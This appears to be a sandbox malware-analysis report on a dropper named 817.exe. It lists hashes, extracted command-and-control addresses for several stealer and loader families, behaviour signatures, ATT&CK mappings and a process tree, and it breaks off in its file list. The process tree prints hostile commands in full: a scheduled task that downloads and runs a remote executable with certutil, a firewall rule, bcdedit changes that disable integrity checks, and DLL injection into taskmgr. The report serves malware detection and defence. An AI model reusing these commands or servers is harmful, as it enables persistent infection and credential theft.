Overview

overview

10

Static

static

3

817.exe

windows7-x64

10

817.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 20:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    817.exe

  • Size

    9.8MB

  • MD5

    724f01298e921f1f7362af6b1bc31642

  • SHA1

    e892f38da2f930133cf67533e592ded56b7d6154

  • SHA256

    8174d7d1e9ccf99d8a0164e39dbb7df725cbd710cf2f611d3ca4f2fdeb434535

  • SHA512

    ee276907cf9d4a0039d3c0affdb318bf08c1b265f4b454bfc9459a923428e701efeccbae1d88c40e2bbc56e05602289aa7e142f7193f39ec4e20bb2fcb4f0953

  • SSDEEP

    196608:PafYtJ9mT5kszFw1d4zZkxaZzDaC0b8LP3gt82xHWPM/SJrUliFGpKERxRE50:SCJ9E5kszq4zZqwzD30biPwzUPZUliFm

Score
10/10
fabookieffdroidergluptebametasploitprivateloaderredlinesectopratsocelarsbuild2_mastifupdagilenetbackdoordiscoverydropperevasioninfostealerloaderpersistenceprivilege_escalationratrootkitspywarestealertrojanupx

Malware Config

Extracted

Family

redline

Botnet

UPD

C2

193.56.146.78:54955

Extracted

Family

privateloader

C2

http://37.0.10.214/proxies.txt

http://37.0.10.244/server.txt

http://wfsdragon.ru/api/setStats.php

37.0.10.237

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

ffdroider

C2

http://186.2.171.3

Extracted

Family

redline

Botnet

Build2_Mastif

C2

95.181.157.69:8552

Signatures

  • Detect Fabookie payload 1 IoCs
  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

    stealerffdroider
  • FFDroider payload 2 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

    spywarestealerfabookie
  • Fabookie family
    fabookie
  • Ffdroider family
    ffdroider
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba family
    glupteba
  • Glupteba payload 11 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

    loaderprivateloader
  • Privateloader family
    privateloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 7 IoCs
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 7 IoCs
  • Sectoprat family
    sectoprat
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars family
    socelars
  • Socelars payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
    evasiontrojan
  • Detected Nirsoft tools 4 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 64 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 2 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • NTFS ADS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
    • Suspicious behavior: LoadsDriver
    PID:476
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k netsvcs
      2⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:848
      • C:\Windows\system32\wbem\WMIADAP.EXE
        wmiadap.exe /F /T /R
        3⤵
          PID:1944
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Checks processor information in registry
        • Modifies registry class
        PID:2684
    • C:\Users\Admin\AppData\Local\Temp\817.exe
      "C:\Users\Admin\AppData\Local\Temp\817.exe"
      1⤵
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2520
      • C:\Users\Admin\AppData\Local\Temp\Lsr.exe
        "C:\Users\Admin\AppData\Local\Temp\Lsr.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2284
      • C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
        "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
      • C:\Users\Admin\AppData\Local\Temp\Info.exe
        "C:\Users\Admin\AppData\Local\Temp\Info.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1596
        • C:\Users\Admin\AppData\Local\Temp\Info.exe
          "C:\Users\Admin\AppData\Local\Temp\Info.exe"
          3⤵
          • Windows security bypass
          • Executes dropped EXE
          • Loads dropped DLL
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:672
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            4⤵
              PID:2260
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                5⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • Modifies data under HKEY_USERS
                PID:2864
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe /94-94
              4⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Manipulates WinMon driver.
              • Manipulates WinMonFS driver.
              • System Location Discovery: System Language Discovery
              • Modifies data under HKEY_USERS
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:2356
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1432
              • C:\Windows\system32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2560
              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2152
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1512
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1524
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2984
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:768
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1196
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1660
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2996
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2756
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:3060
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2752
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2912
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -timeout 0
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:528
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:2476
              • C:\Windows\system32\bcdedit.exe
                C:\Windows\Sysnative\bcdedit.exe /v
                5⤵
                • Modifies boot configuration data using bcdedit
                PID:2864
              • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                5⤵
                • Executes dropped EXE
                PID:2828
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:2824
        • C:\Users\Admin\AppData\Local\Temp\Folder.exe
          "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2560
          • C:\Users\Admin\AppData\Local\Temp\Folder.exe
            "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1644
        • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
          "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:632
        • C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
          "C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1256
        • C:\Users\Admin\AppData\Local\Temp\File.exe
          "C:\Users\Admin\AppData\Local\Temp\File.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1640
        • C:\Users\Admin\AppData\Local\Temp\Installation.EXE
          "C:\Users\Admin\AppData\Local\Temp\Installation.EXE"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:2188
          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2932
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSA035.tmp\Install.cmd" "
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1900
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1XQju7
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                PID:1076
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1076 CREDAT:275457 /prefetch:2
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:1664
          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:236
            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
              "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"
              4⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2084
        • C:\Users\Admin\AppData\Local\Temp\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im chrome.exe
              4⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              PID:1860
        • C:\Users\Admin\AppData\Local\Temp\pub2.exe
          "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2784
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 136
            3⤵
            • Loads dropped DLL
            • Program crash
            PID:2952
        • C:\Users\Admin\AppData\Local\Temp\Files.exe
          "C:\Users\Admin\AppData\Local\Temp\Files.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:2604
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1028
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2328
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2848 CREDAT:275457 /prefetch:2
          2⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • NTFS ADS
          • Suspicious use of SetWindowsHookEx
          PID:2600
      • C:\Windows\system32\rUNdlL32.eXe
        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
        1⤵
        • Process spawned unexpected child process
        PID:1524
        • C:\Windows\SysWOW64\rundll32.exe
          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
          2⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1372
      • C:\Windows\system32\makecab.exe
        "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241224200947.log C:\Windows\Logs\CBS\CbsPersist_20241224200947.cab
        1⤵
        • Drops file in Windows directory
        PID:572

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Event Triggered Execution

      1
      T1546

      Netsh Helper DLL

      1
      T1546.007

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Create or Modify System Process

      1
      T1543

      Windows Service

      1
      T1543.003

      Event Triggered Execution

      1
      T1546

      Netsh Helper DLL

      1
      T1546.007

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Impair Defenses

      4
      T1562

      Disable or Modify System Firewall

      1
      T1562.004

      Disable or Modify Tools

      2
      T1562.001

      Modify Registry

      5
      T1112

      Subvert Trust Controls

      1
      T1553

      Install Root Certificate

      1
      T1553.004

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      4
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        36e80d3d4856d01d06f06433bcdc3a9c

        SHA1

        dd666c84b962f4f1c6370a3ecc01dee3656e6ea2

        SHA256

        d3dc3c1d907013dd2890978963d25b7a9c06891dc014c4a03e614ea605e6a7aa

        SHA512

        c82ee85919171335ac890a8e260b8a419540d518d470204f02b1c3d79caa504510ee8c8485383aaeb36dee6ed5bce4533a77762cf6bbdff9e93701108a7a59dc

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        0460e135ed2a90bae6698719a098f39f

        SHA1

        e86b9a7f9277006651df27cbf31370aed82b0d97

        SHA256

        fb2d37ad6c0f4fd94a60f235ac4a429f00282f2e12b00880797e29267f6bb263

        SHA512

        f183aac57bb40c70b7c07e1ebc2562acf6adfbf6ee4db8f458f44297241e2985b72b5d6e9df5a80876fc2c6f9fdb1075d34eca32094aa42a8f414cb0c23b4ce9

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        32585b5f37a33900653f7567697b63b3

        SHA1

        2bfbf398202d0d7c46ccaf7d38a38ed2fbfa36d2

        SHA256

        cabf62cd590072c95d321d1e3056cb4eff6dfaf5c5ecefaaba36e116d39b8dfb

        SHA512

        038dd0bd0ae3388b250c85be5eca0e6f3f96a9adbe3c4c5490d97869fbd462f5e15d22ab0dd56b37cf68adf08676d6a168031fe321fdc75815d469ac457055ba

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
        Filesize

        4KB

        MD5

        da597791be3b6e732f0bc8b20e38ee62

        SHA1

        1125c45d285c360542027d7554a5c442288974de

        SHA256

        5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

        SHA512

        d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9UR26M8S\suggestions[1].en-US
        Filesize

        17KB

        MD5

        5a34cb996293fde2cb7a4ac89587393a

        SHA1

        3c96c993500690d1a77873cd62bc639b3a10653f

        SHA256

        c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

        SHA512

        e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZKZ95V4R\1Z7Nd7[1].png
        Filesize

        116B

        MD5

        ec6aae2bb7d8781226ea61adca8f0586

        SHA1

        d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3

        SHA256

        b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599

        SHA512

        aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

        Download Submit

      • C:\Users\Admin\AppData\Local\Module_Art\Lsr.exe_Url_jhn0ksrlzfnp5iomvb4rdc0z33jdzvm0\1.2.1.0\pnkfkbwp.newcfg
        Filesize

        1KB

        MD5

        d71a12b7aa02592b03878877eb133425

        SHA1

        899c5404464c3efed66534207d0245e0cf050488

        SHA256

        b44c3fa39198be28e0e723fd458eae31a5f05041926917fe11e2b265aa0cbee4

        SHA512

        ae0733fe01b479f4ad291ac1180ae9f9b5833fa072001c40728d9f26d4aa9e94ec0239432df16cad35c2675b41d58c6e599fbd0dbc1354d297ab8bca30cd4441

        Download Submit

      • C:\Users\Admin\AppData\Local\Module_Art\Lsr.exe_Url_jhn0ksrlzfnp5iomvb4rdc0z33jdzvm0\1.2.1.0\user.config
        Filesize

        842B

        MD5

        1b02b89ab3872d00c6a46cb4a7048dc9

        SHA1

        0840aefbbe40a00d7290d32ce8243de3cf98339e

        SHA256

        ac8517efbed88850a40943fbd667d9a06f6a156f0031109f59b4ca821aa22fd4

        SHA512

        0eeee6c2cf1eaa11d561ba17ed65caf97e069b5ccbf7420c3ae4bf88859f1273034a600da91620411b12cd3241dcfabdc8d4ddd58218f2781254ac6ccf1fa419

        Download Submit

      • C:\Users\Admin\AppData\Local\Module_Art\Lsr.exe_Url_jhn0ksrlzfnp5iomvb4rdc0z33jdzvm0\1.2.1.0\user.config
        Filesize

        964B

        MD5

        8e18625cd36f0075da4bf0ce8fac8204

        SHA1

        0df80ad1c5ea9bddcb5cfcf2c60c6fb3db903216

        SHA256

        35799f5570b76aa51478e74ea9d1c42b39be157c3953a2b44047dd3ed2e629b1

        SHA512

        74d8be6cddfc1c13acb30c18752d93ef8d57348b8b29220914ecb126ae8459318dd150b2f51299870119bdb6483f35417baa988c688f0f621512c5a47e227c26

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\7zSA035.tmp\Install.cmd
        Filesize

        51B

        MD5

        21661026606353f423078c883708787d

        SHA1

        338e288b851e0e5bee26f887e50bfcd8150e8257

        SHA256

        6a77796213adbc0eb764c070a3fdfcb5bfa3ad9b6215c1be43f09bfd32014782

        SHA512

        61760ab64e2c38d9bd5102ab0106e451a5c91e1598906f92e1285b7ae1ca1c6e02480d4157d0f350d2dc816088b5b0838a5d7c7b9d80444ecbf9d62b9ca5b65b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Cab9BC3.tmp
        Filesize

        70KB

        MD5

        49aebf8cbd62d92ac215b2923fb1b9f5

        SHA1

        1723be06719828dda65ad804298d0431f6aff976

        SHA256

        b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

        SHA512

        bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        Filesize

        712KB

        MD5

        b89068659ca07ab9b39f1c580a6f9d39

        SHA1

        7e3e246fcf920d1ada06900889d099784fe06aa5

        SHA256

        9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

        SHA512

        940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
        Filesize

        117KB

        MD5

        3973c47bf5f334ea720a9d603d2c6510

        SHA1

        bf2b72dc12d4d41e08b452e465c40d010b2aba4e

        SHA256

        4e9a1202844e30f1d62d837cdb440764c851740ab8ee2bd4a8a31475bd449eea

        SHA512

        cafc322ba71bafad2b15b82553a2a0749d0b6cb8349fe7fd24de25f7dca48c5aa0c9e7d170571c87a55381ec21d33045d7ba9a17891aabee187358da9b406861

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Info.exe
        Filesize

        4.3MB

        MD5

        165c8d385e0af406deb1089b621c28db

        SHA1

        3d7b93f834a08a9bc790290a20aaf835aaaf9c5c

        SHA256

        7dc6c82e185577088f88e349a6d315138cdbed3956cbb6be5af1f9c098642a33

        SHA512

